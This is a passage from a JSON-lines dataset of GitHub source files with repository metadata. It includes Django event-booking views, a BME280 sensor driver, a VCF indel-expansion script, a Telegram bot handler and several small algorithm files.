r)\n","repo_name":"j0rdiC/lang","sub_path":"data_structures_and_algorithms/algorithms/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33491443674","text":"class RBTree:\n\n def __init__(self):\n self.nil = RBTreeNode(0)\n self.root = self.nil\n\nclass RBTreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n self.parent = None\n self.color = 'black'\n","repo_name":"XiongQiuQiu/CLRS","sub_path":"C13/rb-tree.py","file_name":"rb-tree.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22837122934","text":"from src.models import Post\nfrom pydantic import UUID4\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom collections.abc import 
Sequence\nfrom sqlalchemy import select as sa_select\nfrom sqlalchemy import update as sa_update\nfrom ..schemas.post import PostSchemaCreate, PostSchemaUpdate\n\n\nasync def get_all(db: AsyncSession, bound: int | None = None) -> Sequence[Post]:\n return (await db.execute(sa_select(Post).limit(bound))).scalars().all()\n\n\nasync def get_by_id(db: AsyncSession, post_id: UUID4) -> Post | None:\n return await db.get(Post, post_id)\n\n\nasync def create(db: AsyncSession, post: PostSchemaCreate, owner_id: UUID4) -> Post:\n db_post = Post(title=post.title, text=post.text, owner_id=owner_id)\n db.add(db_post)\n await db.commit()\n await db.refresh(db_post)\n return db_post\n\n\nasync def update(db: AsyncSession, payload: PostSchemaUpdate, post: Post) -> Post:\n update_data = payload.dict(exclude_none=True, exclude_unset=True)\n query = sa_update(Post).where(Post.id == post.id).values(update_data)\n await db.execute(query)\n await db.commit()\n await db.refresh(post)\n return post\n\n\nasync def delete(db: AsyncSession, post: Post) -> None:\n await db.delete(post)\n await db.commit()\n","repo_name":"ramazanix/my_app","sub_path":"src/services/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40453198649","text":"import argparse\nimport logging\nimport pandas as pd\nimport pysam\nimport random\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef write_data_information_to_file(input_data, outfile, ref_sequence, header):\n data_grouped = [group for key, group in input_data.groupby(\"CHROM\")]\n in_fasta = pysam.FastaFile(ref_sequence)\n random.seed(14038)\n\n for line in header:\n if line.startswith(\"#CHROM\"):\n outfile.write(\"#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\n\")\n else:\n outfile.write(line)\n\n for group in data_grouped:\n if \"chr\" in str(group[\"CHROM\"].iloc[0]):\n chrom_id = str(group[\"CHROM\"].iloc[0])\n else:\n chrom_id = \"chr\" + str(group[\"CHROM\"].iloc[0])\n\n for row in group.itertuples():\n # make sure that the window starts at the beginning of the reference sequence\n window_start = max(int(row.POS) - 3, 1)\n\n # make sure that the window won't exceed the reference sequence length\n window_end = min(int(row.POS) + len(row.REF) + 2, in_fasta.get_reference_length(chrom_id))\n extended_ref_seq = in_fasta.fetch(chrom_id, window_start, window_end)\n\n for i in range(abs(window_end-window_start)):\n alt_variant = \"\"\n if (extended_ref_seq[i] == \"A\") or (extended_ref_seq[i] == \"T\"):\n alt_variant = random.choice([\"G\", \"C\"])\n elif (extended_ref_seq[i] == \"G\") or (extended_ref_seq[i] == \"C\"):\n alt_variant = random.choice([\"A\", \"T\"])\n elif (extended_ref_seq[i] == \"N\"):\n logger.warn(\"Reference base was skipped because it was 'N'!\")\n continue\n else:\n logger.error(\"The given reference sequence seems to be corrupted!\")\n\n outfile.write(str(row.CHROM).strip() + \"\\t\" + str(window_start + i + 1).strip() + \"\\t\" + \".\" + \"\\t\" + str(extended_ref_seq[i]).strip() + \"\\t\" + str(alt_variant).strip() + \"\\t\" + \".\" + \"\\t\" + \".\" + \"\\t\" + str(row.INFO).strip() + \"\\n\")\n\n\ndef import_vcf_data(in_data):\n header_line = \"\"\n comment_lines = []\n\n with open(in_data, \"r\") as input_vcf:\n # extract header from vcf file\n for line in input_vcf:\n if line.strip().startswith(\"##\"):\n comment_lines.append(line)\n if line.strip().startswith(\"#CHROM\"):\n header_line = line.strip()\n 
comment_lines.append(line)\n break # now the variant entries are coming\n else:\n continue\n\n if header_line == \"\":\n logger.error(\"The VCF seems to be corrupted, missing header line!\")\n\n # reset file pointer to begin reading at the beginning (is done by closing the file before reading again)\n\n data = pd.read_csv(in_data, names=header_line.split(\"\\t\"), sep=\"\\t\", comment=\"#\", low_memory=False)\n data.fillna(\".\", inplace=True)\n data = data.rename(columns={\"#CHROM\": \"CHROM\"})\n\n return data, comment_lines\n\n\ndef convert_indel_vcf_to_expanded_indel_vcf(in_data, out_data, ref_folder):\n input_data, header = import_vcf_data(in_data)\n with open(out_data, \"w\", newline=\"\") as outfile:\n write_data_information_to_file(input_data, outfile, ref_folder, header)\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--in_data\", type=str, dest=\"in_data\", metavar=\"input.csv\", required=True, help=\"InDel VCF file to expand\\n\")\n parser.add_argument(\"--out_data\", type=str, dest=\"out_data\", metavar=\"output.vcf\", required=True, help=\"Output VCF file\\n\")\n parser.add_argument(\"--ref_path\", type=str, dest=\"ref_path\", metavar=\"/path/to/hg19/Homo_sapiens.GRCh37.dna.chromosome.[ID].fa\", required=True, help=\"Path were the reference genome is found.\\n\")\n args = parser.parse_args()\n\n ref_folder = args.ref_path\n convert_indel_vcf_to_expanded_indel_vcf(args.in_data, args.out_data, args.ref_path)\n","repo_name":"imgag/aiDIVA","sub_path":"aidiva/helper_modules/convert_indels_to_snps_and_create_vcf.py","file_name":"convert_indels_to_snps_and_create_vcf.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"10702861201","text":"from xml.sax.xmlreader import Locator\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render, get_list_or_404\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .models import *\nfrom .forms import *\n\nfrom utils import *\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\ndef index(req):\n\n\n context = {\n 'events': Event.objects.all(),\n 'sub_categories': Sub_category.objects.all(),\n 'categories': Category.objects.all(),\n }\n return render(req, 'events/index.html', context)\n\ndef register(req):\n logger.info('Loading register.html')\n if req.method == \"POST\":\n logger.info(f'Received POST request: {req.POST}')\n form = UserForm(req.POST)\n \n if form.is_valid():\n user = form.save()\n login(req, user)\n logger.info(f\"Registration successful\")\n logger.info('Redirecting to profile page')\n return HttpResponseRedirect(reverse('profile'))\n \n else:\n logger.error(f\"Unsuccessful registration. 
Invalid information.\")\n return render(req, 'events/register.html', {'message':'Invalid Credentials!'})\n\n else:\n form = UserForm()\n\n context = {\n 'form':form\n }\n\n return render(req, 'events/register.html', context)\n\ndef login_view(req):\n logger.info('Loading login.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n username = req.POST['username']\n password = req.POST['password']\n user = authenticate(req, username=username, password= password)\n\n if user is not None:\n login(req, user)\n logger.info(f\"Login successful\")\n logger.info('Redirecting to profile page')\n return HttpResponseRedirect(reverse('profile'))\n else:\n\n logger.error(f\"Unsuccessful registration. Invalid information.\")\n return render(req, 'events/login.html', {'message':'Invalid Credentials!'})\n\n else:\n return render(req, 'events/login.html')\n\ndef logout_view(req):\n logger.info('Logout initiated')\n logout(req)\n logger.info('Logged out succesfully')\n logger.info('Redirecting to main page')\n return HttpResponseRedirect(reverse(index))\n\n@staff_member_required\ndef edit(req):\n\n logger.info('Loading edit.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n form1 = EventForm(req.POST, req.FILES, prefix='form1')\n form2 = CategoryForm(req.POST, prefix='form2')\n form3 = SubCategoryForm(req.POST, prefix='form3')\n form4 = LocationForm(req.POST, prefix='form4')\n\n if form1.is_valid():\n logger.info('form1 saved')\n form1.save()\n if form2.is_valid():\n logger.info('form2 saved')\n form2.save()\n if form3.is_valid():\n logger.info('form3 saved')\n form3.save()\n if form4.is_valid():\n logger.info('form4 saved')\n form4.save()\n\n logger.info('Redirecting to main page')\n return HttpResponseRedirect(reverse('index'))\n\n else:\n form1 = EventForm(prefix='form1')\n form2 = CategoryForm(prefix='form2')\n form3 = SubCategoryForm(prefix='form3')\n form4 = LocationForm(prefix='form4') \n\n context = {\n 'form1' : form1,\n 'form2' : form2,\n 'form3' : form3,\n 'form4' : form4, \n 'events': Event.objects.all(),\n 'sub_categories': Sub_category.objects.all(),\n 'locations': Location.objects.all(),\n }\n\n \n return render(req, 'events/edit.html', context)\n\n@login_required\ndef profile(req):\n logger.info('Loading profile.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n user_form = UserForm(req.POST, instance=req.user)\n profile_form = ProfileForm(req.POST, instance=req.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return HttpResponseRedirect(reverse(profile))\n logger.error('Error in updating the profile')\n else:\n user_form = UserForm(instance=req.user)\n profile_form = ProfileForm(instance=req.user.profile)\n\n currentUserProfile = Profile.objects.filter(pk = req.user.id)\n\n context = {\n 'user_form': user_form,\n 'profile_form': profile_form,\n 'profile': Profile.objects.get(user=req.user),\n 'events':currentUserProfile[0].events.all()\n }\n\n return render(req, 'events/profile.html', context)\n\n@login_required\ndef book_view(req, pk):\n \n event = get_object_or_404(Event, id=req.POST.get('event_id'))\n booked = False\n \n if event.location.capacity > event.users.count():\n\n if event.users.filter(id=req.user.profile.id).exists():\n event.users.remove(req.user.profile)\n booked = False\n else:\n event.users.add(req.user.profile)\n booked = True\n\n else:\n HttpResponseRedirect(reverse(index))\n\n return 
HttpResponseRedirect(reverse('profile'))\n\n@login_required\ndef like_view(req, pk):\n \n event = get_object_or_404(Event, id=req.POST.get('event_id'))\n liked = False\n\n if event.likes.filter(id=req.user.id).exists():\n event.likes.remove(req.user)\n liked = False\n else:\n event.likes.add(req.user)\n liked = True\n\n return HttpResponseRedirect(reverse('index'))\n\n@staff_member_required\ndef edit_event(req, pk):\n\n event = Event.objects.get(id=pk)\n\n if req.method == 'POST':\n eventForm = EventForm(req.POST, instance=event)\n \n if eventForm.is_valid():\n eventForm.save()\n\n return redirect('index')\n \n else:\n eventForm = EventForm(instance=event)\n\n context = {\n 'eventForm' : eventForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef edit_sub_category(req, pk):\n\n sub_category = Sub_category.objects.get(id=pk)\n\n if req.method == 'POST':\n subCategoryForm = SubCategoryForm(req.POST, instance=sub_category)\n\n if subCategoryForm.is_valid():\n subCategoryForm.save()\n\n return redirect('index')\n \n else:\n subCategoryForm = SubCategoryForm(instance=sub_category)\n\n\n context = {\n 'subCategoryForm' : subCategoryForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef edit_location(req, pk):\n\n location = Location.objects.get(id=pk)\n\n if req.method == 'POST':\n locationForm = LocationForm(req.POST, instance=location)\n\n if locationForm.is_valid():\n locationForm.save()\n\n\n return redirect('index')\n \n else:\n locationForm = LocationForm(instance=location)\n\n\n context = {\n 'locationForm' : locationForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef delete_event(req, pk):\n\n event = Event.objects.get(id=pk)\n event.delete()\n\n return redirect('edit')\n\n@staff_member_required\ndef delete_sub_category(req, pk):\n\n sub_category = Sub_category.objects.get(id=pk)\n sub_category.delete()\n\n return redirect('edit')\n\n@staff_member_required\ndef delete_location(req, pk):\n\n location = Location.objects.get(id=pk)\n location.delete()\n\n return redirect('edit')\n","repo_name":"JasonGri/Event-Bookings","sub_path":"EventBookings/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72736874186","text":"from telegram import Update, InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import CallbackQueryHandler\n\nfrom django.utils.translation import gettext as _\n\nfrom .l10n_context import L10nContext\n\nfrom summary.tasks import create_image_variation\n\n\nasync def create_dalle_variation(update: Update, context: L10nContext):\n await update.callback_query.answer()\n\n try:\n file_id = int(context.match.group(1))\n except (ValueError, AttributeError):\n return\n\n result = await create_image_variation(\n bot_token=context.bot.token,\n user_id=update.effective_user.id,\n file_id=file_id,\n chat_id=update.effective_message.chat_id,\n message_id=update.effective_message.id,\n )\n\n if not result['url']:\n return\n\n await update.effective_message.reply_photo(\n photo=result['url'],\n caption=result['db_image'].prompt,\n reply_markup=InlineKeyboardMarkup.from_button(\n InlineKeyboardButton(\n text=_('Try another variation'),\n callback_data=f'create_variation_{result[\"db_image\"].id}',\n ),\n ),\n )\n\n\nhandler = CallbackQueryHandler(pattern=r'create_variation_(\\d+)', 
callback=create_dalle_variation)\n","repo_name":"aq1/openai-bot","sub_path":"bot/tg/handlers/create_dalle_variation_handler.py","file_name":"create_dalle_variation_handler.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39719186504","text":"\"\"\"\nGiven an integer array B of size N.\nYou need to find the Ath largest element in the subarray [1 to i] where i varies from 1 to N. In other words, find the Ath largest element in the sub-arrays [1 : 1], [1 : 2], [1 : 3], ...., [1 : N].\nNOTE: If any subarray [1 : i] has less than A elements then output array should be -1 at the ith index.\n\"\"\"\nimport heapq\nclass Solution:\n def solve(self, A: int, B: list) -> list:\n n = len(B)\n heap = list()\n ans = [-1 for _ in range(n)]\n if n < A: return ans\n for v in range(A):\n heap.append(B[v])\n heapq.heapify(heap)\n ans[A - 1] = heap[0]\n\n for i in range(A, n):\n if heap[0] < B[i]:\n heapq.heapreplace(heap, B[i])\n ans[i] = heap[0]\n return ans\n\nt = Solution()\nA = 5\nB = [1, 2, 3, 4, 5, 6] \nprint(t.solve(A, B))\n","repo_name":"anurag5398/DSA-Problems","sub_path":"Heaps/AthLargest.py","file_name":"AthLargest.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31030004907","text":"\"\"\"BME280 Driver.\"\"\"\n# original from Pimoroni. Modified TheHWcave \nfrom i2cdevice import Device, Register, BitField, _int_to_bytes\nfrom i2cdevice.adapter import LookupAdapter, Adapter\nimport struct\nimport time\n\n\n__version__ = '9.9.9.9' #TheHWcave: Bump from 0.0.1\n\n\nCHIP_ID = 0x60\nI2C_ADDRESS_GND = 0x76\nI2C_ADDRESS_VCC = 0x77\n\n\nclass S8Adapter(Adapter):\n\t\"\"\"Convert unsigned 8bit integer to signed.\"\"\"\n\n\tdef _decode(self, value):\n\t\tif value & (1 << 7):\n\t\t\tvalue -= 1 << 8\n\t\treturn value\n\n\nclass S16Adapter(Adapter):\n\t\"\"\"Convert unsigned 16bit integer to signed.\"\"\"\n\n\tdef _decode(self, value):\n\t\treturn struct.unpack('> 4) & 0x0F) | (b[1] << 4)\n\t\tif r & (1 << 11):\n\t\t\tr = r - 1 << 12\n\t\treturn r\n\n\nclass H4Adapter(S16Adapter):\n\tdef _decode(self, value):\n\t\tb = _int_to_bytes(value, 2)\n\t\tr = (b[0] << 4) | (b[1] & 0x0F)\n\t\tif r & (1 << 11):\n\t\t\tr = r - 1 << 12\n\t\treturn r\n\n\nclass BME280Calibration():\n\tdef __init__(self):\n\t\tself.dig_t1 = 0\n\t\tself.dig_t2 = 0\n\t\tself.dig_t3 = 0\n\n\t\tself.dig_p1 = 0\n\t\tself.dig_p2 = 0\n\t\tself.dig_p3 = 0\n\t\tself.dig_p4 = 0\n\t\tself.dig_p5 = 0\n\t\tself.dig_p6 = 0\n\t\tself.dig_p7 = 0\n\t\tself.dig_p8 = 0\n\t\tself.dig_p9 = 0\n\n\t\tself.dig_h1 = 0\n\t\tself.dig_h2 = 0\n\t\tself.dig_h3 = 0\n\t\tself.dig_h4 = 0\n\t\tself.dig_h5 = 0\n\t\tself.dig_h6 = 0\n\n\t\tself.temperature_fine = 0\n\t\t\n\t\t\n\t\n\t\n\tdef compensate_temperature(self, raw_temperature):\n\t\tvar1 = (raw_temperature / 16384.0 - self.dig_t1 / 1024.0) * self.dig_t2\n\t\tvar2 = raw_temperature / 131072.0 - self.dig_t1 / 8192.0\n\t\tvar2 = var2 * var2 * self.dig_t3\n\t\tself.temperature_fine = (var1 + var2) \n\t\treturn self.temperature_fine / 5120.0\n\n\tdef compensate_pressure(self, raw_pressure):\n\t\tvar1 = self.temperature_fine / 2.0 - 64000.0\n\t\tvar2 = var1 * var1 * self.dig_p6 / 32768.0\n\t\tvar2 = var2 + var1 * self.dig_p5 * 2\n\t\tvar2 = var2 / 4.0 + self.dig_p4 * 65536.0\n\t\tvar1 = (self.dig_p3 * var1 * var1 / 524288.0 + self.dig_p2 * var1) / 524288.0\n\t\tvar1 = (1.0 + var1 / 32768.0) * 
self.dig_p1\n\t\tpressure = 1048576.0 - raw_pressure\n\t\tpressure = (pressure - var2 / 4096.0) * 6250.0 / var1\n\t\tvar1 = self.dig_p9 * pressure * pressure / 2147483648.0\n\t\tvar2 = pressure * self.dig_p8 / 32768.0\n\t\treturn pressure + (var1 + var2 + self.dig_p7) / 16.0\n\n\tdef compensate_humidity(self, raw_humidity):\n\t\thumidity = self.temperature_fine - 76800.0\n\t\thumidity = (raw_humidity - (self.dig_h4 * 64.0 + self.dig_h5 / 16384.0 * humidity)) * (self.dig_h2 / 65536.0 * (1.0 + self.dig_h6 / 67108864.0 * humidity * (1.0 + self.dig_h3 / 67108864.0 * humidity)))\n\t\thumidity = humidity * (1.0 - self.dig_h1 * humidity / 524288.0)\n\t\treturn max(0.0, min(100.0, humidity))\n\n\nclass BME280_new:\n\tdef __init__(self, i2c_addr=I2C_ADDRESS_GND, i2c_dev=None):\n\t\tself.calibration = BME280Calibration()\n\t\t\n\t\t\n\t\tself._is_setup = False\n\t\tself._i2c_addr = i2c_addr\n\t\tself._i2c_dev = i2c_dev\n\t\tself._bme280 = Device([I2C_ADDRESS_GND, I2C_ADDRESS_VCC], i2c_dev=self._i2c_dev, bit_width=8, registers=(\n\t\t\tRegister('CHIP_ID', 0xD0, fields=(\n\t\t\t\tBitField('id', 0xFF),\n\t\t\t)),\n\t\t\tRegister('RESET', 0xE0, fields=(\n\t\t\t\tBitField('reset', 0xFF),\n\t\t\t)),\n\t\t\tRegister('STATUS', 0xF3, fields=(\n\t\t\t\tBitField('measuring', 0b00001000), # 1 when conversion is running\n\t\t\t\tBitField('im_update', 0b00000001), # 1 when NVM data is being copied\n\t\t\t)),\n\t\t\tRegister('CTRL_MEAS', 0xF4, fields=(\n\t\t\t\tBitField('osrs_t', 0b11100000, # Temperature oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101\n\t\t\t\t\t\t })),\n\t\t\t\tBitField('osrs_p', 0b00011100, # Pressure oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101})),\n\t\t\t\tBitField('mode', 0b00000011, # Power mode\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 'sleep': 0b00,\n\t\t\t\t\t\t\t 'forced': 0b10,\n\t\t\t\t\t\t\t 'normal': 0b11})),\n\t\t\t)),\n\t\t\tRegister('CTRL_HUM', 0xF2, fields=(\n\t\t\t\tBitField('osrs_h', 0b00000111, # Humidity oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101})),\n\t\t\t)),\n\t\t\tRegister('CONFIG', 0xF5, fields=(\n\t\t\t\tBitField('t_sb', 0b11100000, # Temp standby duration in normal mode\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 0.5: 0b000,\n\t\t\t\t\t\t\t 62.5: 0b001,\n\t\t\t\t\t\t\t 125: 0b010,\n\t\t\t\t\t\t\t 250: 0b011,\n\t\t\t\t\t\t\t 500: 0b100,\n\t\t\t\t\t\t\t 1000: 0b101,\n\t\t\t\t\t\t\t 10: 0b110,\n\t\t\t\t\t\t\t 20: 0b111})),\n\t\t\t\tBitField('filter', 0b00011100), # Controls the time constant of the IIR filter\n\t\t\t\tBitField('spi3w_en', 0b0000001, read_only=True), # Enable 3-wire SPI interface when set to 1. 
IE: Don't set this bit!\n\t\t\t)),\n\t\t\tRegister('DATA', 0xF7, fields=(\n\t\t\t\tBitField('humidity', 0x000000000000FFFF),\n\t\t\t\tBitField('temperature', 0x000000FFFFF00000),\n\t\t\t\tBitField('pressure', 0xFFFFF00000000000)\n\t\t\t), bit_width=8 * 8),\n\t\t\tRegister('CALIBRATION', 0x88, fields=(\n\t\t\t\tBitField('dig_t1', 0xFFFF << 16 * 12, adapter=U16Adapter()), # 0x88 0x89\n\t\t\t\tBitField('dig_t2', 0xFFFF << 16 * 11, adapter=S16Adapter()), # 0x8A 0x8B\n\t\t\t\tBitField('dig_t3', 0xFFFF << 16 * 10, adapter=S16Adapter()), # 0x8C 0x8D\n\t\t\t\tBitField('dig_p1', 0xFFFF << 16 * 9, adapter=U16Adapter()), # 0x8E 0x8F\n\t\t\t\tBitField('dig_p2', 0xFFFF << 16 * 8, adapter=S16Adapter()), # 0x90 0x91\n\t\t\t\tBitField('dig_p3', 0xFFFF << 16 * 7, adapter=S16Adapter()), # 0x92 0x93\n\t\t\t\tBitField('dig_p4', 0xFFFF << 16 * 6, adapter=S16Adapter()), # 0x94 0x95\n\t\t\t\tBitField('dig_p5', 0xFFFF << 16 * 5, adapter=S16Adapter()), # 0x96 0x97\n\t\t\t\tBitField('dig_p6', 0xFFFF << 16 * 4, adapter=S16Adapter()), # 0x98 0x99\n\t\t\t\tBitField('dig_p7', 0xFFFF << 16 * 3, adapter=S16Adapter()), # 0x9A 0x9B\n\t\t\t\tBitField('dig_p8', 0xFFFF << 16 * 2, adapter=S16Adapter()), # 0x9C 0x9D\n\t\t\t\tBitField('dig_p9', 0xFFFF << 16 * 1, adapter=S16Adapter()), # 0x9E 0x9F\n\t\t\t\tBitField('dig_h1', 0x00FF), # 0xA1 uint8\n\t\t\t), bit_width=26 * 8),\n\t\t\tRegister('CALIBRATION2', 0xE1, fields=(\n\t\t\t\tBitField('dig_h2', 0xFFFF0000000000, adapter=S16Adapter()), # 0xE1 0xE2\n\t\t\t\tBitField('dig_h3', 0x0000FF00000000), # 0xE3 uint8\n\t\t\t\tBitField('dig_h4', 0x000000FFFF0000, adapter=H4Adapter()), # 0xE4 0xE5[3:0]\n\t\t\t\tBitField('dig_h5', 0x00000000FFFF00, adapter=H5Adapter()), # 0xE5[7:4] 0xE6\n\t\t\t\tBitField('dig_h6', 0x000000000000FF, adapter=S8Adapter()) # 0xE7 int8\n\t\t\t), bit_width=7 * 8)\n\t\t))\n\n\tdef setup(self, mode='normal', temperature_oversampling=16, pressure_oversampling=16, humidity_oversampling=16, temperature_standby=500):\n\t\tif self._is_setup:\n\t\t\treturn\n\t\tself._is_setup = True\n\n\t\tself._bme280.select_address(self._i2c_addr)\n\t\tself._mode = mode\n\t\t\n\n\t\tif mode == \"forced\":\n\t\t\tmode = \"sleep\"\n\n\t\ttry:\n\t\t\tif self._bme280.CHIP_ID.get_id() != CHIP_ID:\n\t\t\t\traise RuntimeError(\"Unable to find bme280 on 0x{:02x}, CHIP_ID returned {:02x}\".format(self._i2c_addr, self._bme280.CHIP_ID.get_id()))\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Unable to find bme280 on 0x{:02x}, IOError\".format(self._i2c_addr))\n\n\t\tself._bme280.RESET.set_reset(0xB6)\n\t\ttime.sleep(0.1)\n\n\t\tself._bme280.CTRL_HUM.set_osrs_h(humidity_oversampling)\n\n\t\twith self._bme280.CTRL_MEAS as CTRL_MEAS:\n\t\t\tCTRL_MEAS.set_mode(mode)\n\t\t\tCTRL_MEAS.set_osrs_t(temperature_oversampling)\n\t\t\tCTRL_MEAS.set_osrs_p(pressure_oversampling)\n\t\t\tCTRL_MEAS.write()\n\n\t\twith self._bme280.CONFIG as CONFIG:\n\t\t\tCONFIG.set_t_sb(temperature_standby)\n\t\t\tCONFIG.set_filter(2)\n\t\t\tCONFIG.write()\n\n\t\twith self._bme280.CALIBRATION as CALIBRATION:\n\t\t\tself.calibration.dig_t1 = CALIBRATION.get_dig_t1()\n\t\t\tself.calibration.dig_t2 = CALIBRATION.get_dig_t2()\n\t\t\tself.calibration.dig_t3 = CALIBRATION.get_dig_t3()\n\n\t\t\tself.calibration.dig_p1 = CALIBRATION.get_dig_p1()\n\t\t\tself.calibration.dig_p2 = CALIBRATION.get_dig_p2()\n\t\t\tself.calibration.dig_p3 = CALIBRATION.get_dig_p3()\n\t\t\tself.calibration.dig_p4 = CALIBRATION.get_dig_p4()\n\t\t\tself.calibration.dig_p5 = CALIBRATION.get_dig_p5()\n\t\t\tself.calibration.dig_p6 = 
CALIBRATION.get_dig_p6()\n\t\t\tself.calibration.dig_p7 = CALIBRATION.get_dig_p7()\n\t\t\tself.calibration.dig_p8 = CALIBRATION.get_dig_p8()\n\t\t\tself.calibration.dig_p9 = CALIBRATION.get_dig_p9()\n\n\t\t\tself.calibration.dig_h1 = CALIBRATION.get_dig_h1()\n\n\t\twith self._bme280.CALIBRATION2 as CALIBRATION:\n\t\t\tself.calibration.dig_h2 = CALIBRATION.get_dig_h2()\n\t\t\tself.calibration.dig_h3 = CALIBRATION.get_dig_h3()\n\t\t\tself.calibration.dig_h4 = CALIBRATION.get_dig_h4()\n\t\t\tself.calibration.dig_h5 = CALIBRATION.get_dig_h5()\n\t\t\tself.calibration.dig_h6 = CALIBRATION.get_dig_h6()\n\n\t\n\t\t\n\tdef update_sensor(self):\n\t\tself.setup()\n\n\t\tif self._mode == \"forced\":\n\t\t\t# Trigger a reading in forced mode and wait for result\n\t\t\tself._bme280.CTRL_MEAS.set_mode(\"forced\")\n\t\t\twhile self._bme280.STATUS.get_measuring():\n\t\t\t\ttime.sleep(0.001)\n\n\t\twith self._bme280.DATA as DATA:\n\t\t\traw_temperature = DATA.get_temperature()\n\t\t\traw_pressure = DATA.get_pressure()\n\t\t\traw_humidity = DATA.get_humidity()\n\n\t\tself.temperature = self.calibration.compensate_temperature(raw_temperature)\n\t\tself.pressure = self.calibration.compensate_pressure(raw_pressure) / 100.0\n\t\tself.humidity = self.calibration.compensate_humidity(raw_humidity)\n\t\treturn (self.temperature, self.pressure, self.humidity) # TheHWcave: added return values\n\n\tdef get_temperature(self):\n\t\tself.update_sensor()\n\t\treturn self.temperature\n\n\tdef get_pressure(self):\n\t\tself.update_sensor()\n\t\treturn self.pressure\n\n\tdef get_humidity(self):\n\t\tself.update_sensor()\n\t\treturn self.humidity\n\n\tdef get_altitude(self, qnh=1013.25):\n\t\tself.update_sensor()\n\t\tpressure = self.get_pressure()\n\t\taltitude = 44330.0 * (1.0 - pow(pressure / qnh, (1.0 / 5.255)))\n\t\treturn altitude\n","repo_name":"TheHWcave/Enviro-Plus","sub_path":"review-part1/BME280_new.py","file_name":"BME280_new.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"19876024819","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom spline import QuinticSpline\n\ndef plot_spline(spline, ax, **kwargs):\n # type: (QuinticSpline, Axes3D, **dict) -> None\n t = np.linspace(0, 1, 100)\n points = np.array([spline.evaluate(x) for x in t])\n xs = points[:, 0]\n ys = points[:, 1]\n zs = points[:, 2]\n ax.plot(xs, ys, zs=zs, **kwargs)\n\ndef propose_geometric_spline_path(p1, p2, p3, t1 = None, t3 = None, a1 = None, a3 = None):\n # type: (np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray) -> list[QuinticSpline]\n direct12 = p2 - p1\n direct23 = p3 - p2\n\n # default t1 and t3 is the same as the direction of p1 -> p2 and p2 -> p3. 
